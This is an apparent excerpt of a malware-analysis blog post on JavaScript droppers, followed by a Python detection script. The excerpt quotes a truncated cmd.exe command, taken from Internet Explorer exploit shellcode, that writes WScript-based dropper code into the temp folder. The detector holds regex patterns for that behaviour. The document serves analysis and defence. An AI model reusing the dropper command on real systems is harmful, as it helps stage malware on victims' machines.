Oh look – JavaScript Droppers
One of them is the shellcode from an Internet Explorer exploit which, instead of downloading a binary, executes the following CMD command:
Windows/syswow64/cmd.exe cmd.exe /q /c cd /d "%tmp%" && echo var w=g("WScript.Shell"),a=g("Scripting.FileSystemObject"),w1=WScript;try{m=w1.Arguments;u=600;o="***";w1.Sleep(u*u);var n=h(m(2),m(1),m(0));if (n.indexOf(o)^>3){k=n.split(o);l=k[1].split(";");for (var i=0;i^
https://labs.bromium.com/2015/06/12/oh-look-javascript-droppers/
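A detection-side sketch for the command line quoted above, added here as an example and not taken from the original post: it scores process command lines for the pattern of `cmd.exe` changing into `%tmp%` and echoing script source that references `WScript.Shell`. The indicator names, weights and threshold are assumptions, and the benign lines are constructed for contrast.

```python
import re

# Prefix of the command quoted above, copied from the page (it is truncated there too).
PAGE_CMD = (
    r'Windows/syswow64/cmd.exe cmd.exe /q /c cd /d "%tmp%" && echo var '
    r'w=g("WScript.Shell"),a=g("Scripting.FileSystemObject"),w1=WScript;'
    r'try{m=w1.Arguments;u=600;o="***";w1.Sleep(u*u);var n=h(m(2),m(1),m(0));'
    r'if (n.indexOf(o)^>3){'
)

# Constructed benign command lines for contrast.
BENIGN = [
    r'cmd.exe /c cd /d "%tmp%" && dir',
    r'cmd.exe /q /c echo build finished',
]

# (name, pattern, weight); the weights and the threshold below are assumptions.
INDICATORS = [
    ("cmd_quiet_exec", re.compile(r'cmd(?:\.exe)?\s+/q\s+/c\b', re.I), 1),
    ("cd_to_temp", re.compile(r'\bcd\s+/d\s+"?%te?mp%"?', re.I), 2),
    ("echo_script_source", re.compile(r'&&\s*echo\s+(?:var|function)\b', re.I), 2),
    ("wscript_shell", re.compile(r'wscript\.shell', re.I), 2),
    ("filesystemobject", re.compile(r'scripting\.filesystemobject', re.I), 1),
]


def normalize(cmdline):
    """Undo cmd.exe caret escaping (^> becomes >) and collapse whitespace.
    Simplification: carets inside double quotes are stripped as well."""
    unescaped = re.sub(r'\^(.)', r'\1', cmdline)
    return re.sub(r'\s+', ' ', unescaped).strip()


def score(cmdline):
    """Return (total weight, names of matched indicators) for one command line."""
    text = normalize(cmdline)
    hits = [(name, weight) for name, rx, weight in INDICATORS if rx.search(text)]
    return sum(w for _, w in hits), [name for name, _ in hits]


def is_suspicious(cmdline, threshold=5):
    return score(cmdline)[0] >= threshold


if __name__ == "__main__":
    for line in [PAGE_CMD] + BENIGN:
        total, hits = score(line)
        print(is_suspicious(line), total, hits)
```

The same scoring can be applied to the command-line field of process-creation logs; matching on the combination rather than on any single indicator keeps ordinary `cd /d "%tmp%"` usage below the threshold.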